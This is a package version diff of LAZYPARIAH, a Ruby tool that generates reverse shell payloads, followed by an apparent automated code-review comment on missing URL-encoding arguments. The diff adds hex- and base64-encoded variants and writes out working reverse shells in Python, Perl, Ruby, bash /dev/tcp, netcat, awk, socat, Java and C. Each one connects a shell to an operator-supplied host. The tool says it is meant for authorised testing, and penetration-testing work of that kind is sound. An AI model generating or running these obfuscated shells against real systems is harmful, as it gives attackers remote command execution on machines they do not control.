lazypariah 0.3.0 → 0.4.0
- checksums.yaml +4 -4
- data/bin/lazypariah +45 -7
- metadata +2 -2
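--- a/checksums.yaml
+++ b/checksums.yaml
@@ -1,7 +1,7 @@
 ---
 SHA256:
-metadata.gz:
-data.tar.gz:
+metadata.gz: a3aee611f4d7a3d19d4c7816eee540e7a2d0e04523e565719158e78fe365a026
+data.tar.gz: 7f63871c91c193144da7182a32eabd9c401561deb8fbf1c6678ceb953a8d9a37
 SHA512:
-metadata.gz:
-data.tar.gz:
+metadata.gz: f049e7ff4764242aab6cee06bb8b9e314061d751241260e66045465e4dd38c926fe483886b7513c684d0ee9b26c8bb12d039f5f6ab8831b313856f7d431beb91
+data.tar.gz: 48c488ee7a6776f336d7e806bcb914645ab04cc56cc0adda1c9aaeec70999b0f2b94ed30f7818c4e67d74bb5638b113889e3c938bd45d80c91932ddfb89a1a93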
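--- a/data/bin/lazypariah
+++ b/data/bin/lazypariah
@@ -1,7 +1,7 @@
 #!/usr/bin/env ruby
 #
 # Title: LAZYPARIAH
-# Version: 0.
+# Version: 0.4.0
 # Description:
 # LAZYPARIAH is a simple tool for generating various reverse shell payloads
 # on the fly. It is intended to be used only in authorised circumstances by
@@ -29,7 +29,7 @@ require "stringio"
 
 # Define constants.
 PROGRAM_NAME = "LAZYPARIAH".freeze()
-PROGRAM_VERSION = "0.
+PROGRAM_VERSION = "0.4.0".freeze()
 EXECUTABLE_NAME = "lazypariah".freeze()
 
 # Define payload list.
@@ -41,6 +41,9 @@ PAYLOAD_LIST = [
 "python3_b64",
 "python2_b64",
 "python_b64",
+"python3_hex",
+"python2_hex",
+"python_hex",
 "nc",
 "nc_pipe",
 "php_fd_3",
@@ -57,9 +60,12 @@ PAYLOAD_LIST = [
 "php_fd_6_tags",
 "perl",
 "perl_c",
+"perl_b64",
+"perl_hex",
 "ruby",
 "ruby_c",
 "ruby_b64",
+"ruby_hex",
 "bash_tcp",
 "awk",
 "socat",
@@ -68,8 +74,10 @@ PAYLOAD_LIST = [
 "java_class_gzip_b64",
 "c_binary",
 "c_binary_b64",
+"c_binary_hex",
 "c_binary_gzip",
-"c_binary_gzip_b64"
+"c_binary_gzip_b64",
+"c_binary_gzip_hex"
 ].sort()
 
 # Define function for displaying program information.
@@ -166,12 +174,21 @@ begin
 when "python3_b64"
 code = Base64.strict_encode64("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);")
 print_output("echo #{code} | base64 -d | python3", url_encode=url_encode)
+when "python3_hex"
+code = "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);".unpack("H*")[0]
+print_output("echo #{code} | xxd -p -r - | python3", url_encode=url_encode)
 when "python2_b64"
 code = Base64.strict_encode64("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);")
 print_output("echo #{code} | base64 -d | python2", url_encode=url_encode)
+when "python2_hex"
+code = "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);".unpack("H*")[0]
+print_output("echo #{code} | xxd -p -r - | python2", url_encode=url_encode)
 when "python_b64"
 code = Base64.strict_encode64("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);")
 print_output("echo #{code} | base64 -d | python", url_encode=url_encode)
+when "python_hex"
+code = "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);".unpack("H*")[0]
+print_output("echo #{code} | xxd -p -r - | python", url_encode=url_encode)
 when "nc"
 print_output("nc -e /bin/sh #{ARGV[1]} #{ARGV[2]}", url_encode=url_encode)
 when "nc_pipe"
@@ -204,6 +221,12 @@ begin
 print_output("use Socket;$i=\"#{ARGV[1]}\";$p=#{ARGV[2]};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};", url_encode=url_encode)
 when "perl_c"
 print_output("perl -e 'use Socket;$i=\"#{ARGV[1]}\";$p=#{ARGV[2]};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'", url_encode=url_encode)
+when "perl_b64"
+code = Base64.strict_encode64("use Socket;$i=\"#{ARGV[1]}\";$p=#{ARGV[2]};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};")
+print_output("echo #{code} | base64 -d | perl", url_encode=url_encode)
+when "perl_hex"
+code = "use Socket;$i=\"#{ARGV[1]}\";$p=#{ARGV[2]};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};".unpack("H*")[0]
+print_output("echo #{code} | xxd -p -r - | perl", url_encode=url_encode)
 when "ruby"
 print_output("require \"socket\";exit if fork;c=TCPSocket.new(\"#{ARGV[1]}\",\"#{ARGV[2]}\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end", url_encode=url_encode)
 when "ruby_c"
@@ -211,12 +234,15 @@ begin
 when "ruby_b64"
 code = Base64.strict_encode64("require \"socket\";exit if fork;c=TCPSocket.new(\"#{ARGV[1]}\",\"#{ARGV[2]}\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end")
 print_output("echo #{code} | base64 -d | ruby", url_encode=url_encode)
+when "ruby_hex"
+code = "require \"socket\";exit if fork;c=TCPSocket.new(\"#{ARGV[1]}\",\"#{ARGV[2]}\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end".unpack("H*")[0]
+print_output("echo #{code} | xxd -p -r - | ruby", url_encode=url_encode)
 when "bash_tcp"
 print_output("bash -i >& /dev/tcp/#{ARGV[1]}/#{ARGV[2]} 0>&1", url_encode=url_encode)
 when "awk"
 print_output("awk 'BEGIN {s = \"/inet/tcp/0/#{ARGV[1]}/#{ARGV[2]}\"; while(42) {do {printf \"[Awk Reverse Shell] >> \" |& s; s |& getline c; if (c) {while ((c |& getline) > 0) print $0 |& s; close(c);}} while (c != \"exit\") close(s);}}' /dev/null", url_encode=url_encode)
 when "socat"
-print_output("socat tcp-connect:#{ARGV[1]}:#{ARGV[2]} system:/bin/sh")
+print_output("socat tcp-connect:#{ARGV[1]}:#{ARGV[2]} system:/bin/sh", url_encode=url_encode)
 when "java_class_binary", "java_class_b64", "java_class_gzip_b64"
 code = "import java.io.IOException;import java.io.InputStream;import java.io.OutputStream;import java.net.Socket;public class rs {public rs() throws Exception {Process p=new ProcessBuilder(\"/bin/sh\").redirectErrorStream(true).start();Socket s=new Socket(\"#{ARGV[1]}\",#{ARGV[2]});InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()) {while(pi.available()>0) {so.write(pi.read());}while(pe.available()>0) {so.write(pe.read());}while(si.available()>0) {po.write(si.read());}so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;} catch (Exception e) {}}p.destroy();s.close();}}"
 
@@ -246,7 +272,7 @@ begin
 end
 
 system("rm -r #{temp_dir}")
-when "c_binary", "c_binary_gzip", "c_binary_b64", "c_binary_gzip_b64"
+when "c_binary", "c_binary_gzip", "c_binary_b64", "c_binary_gzip_b64", "c_binary_hex", "c_binary_gzip_hex"
 code = "#include <stdio.h>\n#include <sys/socket.h>\n#include <sys/types.h>\n#include <stdlib.h>\n#include <unistd.h>\n#include <netinet/in.h>\n#include <arpa/inet.h>\nint main(void){int port = #{ARGV[2]};struct sockaddr_in revsockaddr;int sockt = socket(AF_INET, SOCK_STREAM, 0);revsockaddr.sin_family = AF_INET;revsockaddr.sin_port = htons(port);revsockaddr.sin_addr.s_addr = inet_addr(\"#{ARGV[1]}\");connect(sockt, (struct sockaddr *) &revsockaddr, sizeof(revsockaddr));dup2(sockt, 0);dup2(sockt, 1);dup2(sockt, 2);char * const argv[] = {\"/bin/sh\", NULL};execve(\"/bin/sh\", argv, NULL);\nreturn 0;}"
 
 temp_dir = IO.popen("mktemp -dt lazypariah_XXXXXXXX").read().chomp()
@@ -261,7 +287,10 @@ begin
 print_output(binary_payload)
 when "c_binary_b64"
 binary_payload_b64 = Base64.strict_encode64(binary_payload)
-print_output(binary_payload_b64)
+print_output(binary_payload_b64, url_encode=url_encode)
+when "c_binary_hex"
+binary_payload_hex = binary_payload.unpack("H*")[0]
+print_output(binary_payload_hex)
 when "c_binary_gzip"
 sio = StringIO.new()
 sio.binmode()
@@ -269,7 +298,7 @@ begin
 gz.write(binary_payload)
 gz.close()
 binary_payload_gzip = sio.string
-print_output(binary_payload_gzip
+print_output(binary_payload_gzip)
 when "c_binary_gzip_b64"
 sio = StringIO.new()
 sio.binmode()
@@ -279,6 +308,15 @@ begin
 binary_payload_gzip = sio.string
 binary_payload_gzip_b64 = Base64.strict_encode64(binary_payload_gzip)
 print_output(binary_payload_gzip_b64, url_encode=url_encode)
+when "c_binary_gzip_hex"
+sio = StringIO.new()
+sio.binmode()
+gz = Zlib::GzipWriter.new(sio)
+gz.write(binary_payload)
+gz.close()
+binary_payload_gzip = sio.string
+binary_payload_gzip_hex = binary_payload_gzip.unpack("H*")[0]
+print_output(binary_payload_gzip_hex)
 end
 end
 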
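Review bot: The new `c_binary_hex` and `c_binary_gzip_hex` branches call `print_output(binary_payload_hex)` and `print_output(binary_payload_gzip_hex)` without the `url_encode` argument, while every other text-encoded branch in this commit — including the `socat` and `c_binary_b64` lines it explicitly fixes — passes `url_encode=url_encode`, so the URL-encoding option is silently ignored for exactly these two outputs. Change them to `print_output(binary_payload_hex, url_encode=url_encode)` and `print_output(binary_payload_gzip_hex, url_encode=url_encode)`. Separately, `url_encode=url_encode` is a local assignment whose value is passed positionally, not a keyword argument; if `print_output` (defined outside these hunks) takes a keyword, `url_encode: url_encode` would say what is meant and would fail loudly on a typo. The gzip setup (`StringIO.new`/`binmode`/`GzipWriter`/`write`/`close`/`sio.string`) is now copied verbatim in three branches and would read better as a small helper returning the gzipped string. The enclosing `case` and the `begin` block start and end outside these hunks.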
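--- a/metadata
+++ b/metadata
@@ -1,14 +1,14 @@
 --- !ruby/object:Gem::Specification
 name: lazypariah
 version: !ruby/object:Gem::Version
-version: 0.
+version: 0.4.0
 platform: ruby
 authors:
 - Peter Funnell
 autorequire:
 bindir: bin
 cert_chain: []
-date: 2020-11-
+date: 2020-11-24 00:00:00.000000000 Z
 dependencies: []
 description: LAZYPARIAH is a simple tool for generating a range of reverse shell payloads
 on the fly. It is intended to be used only in authorised circumstances by qualified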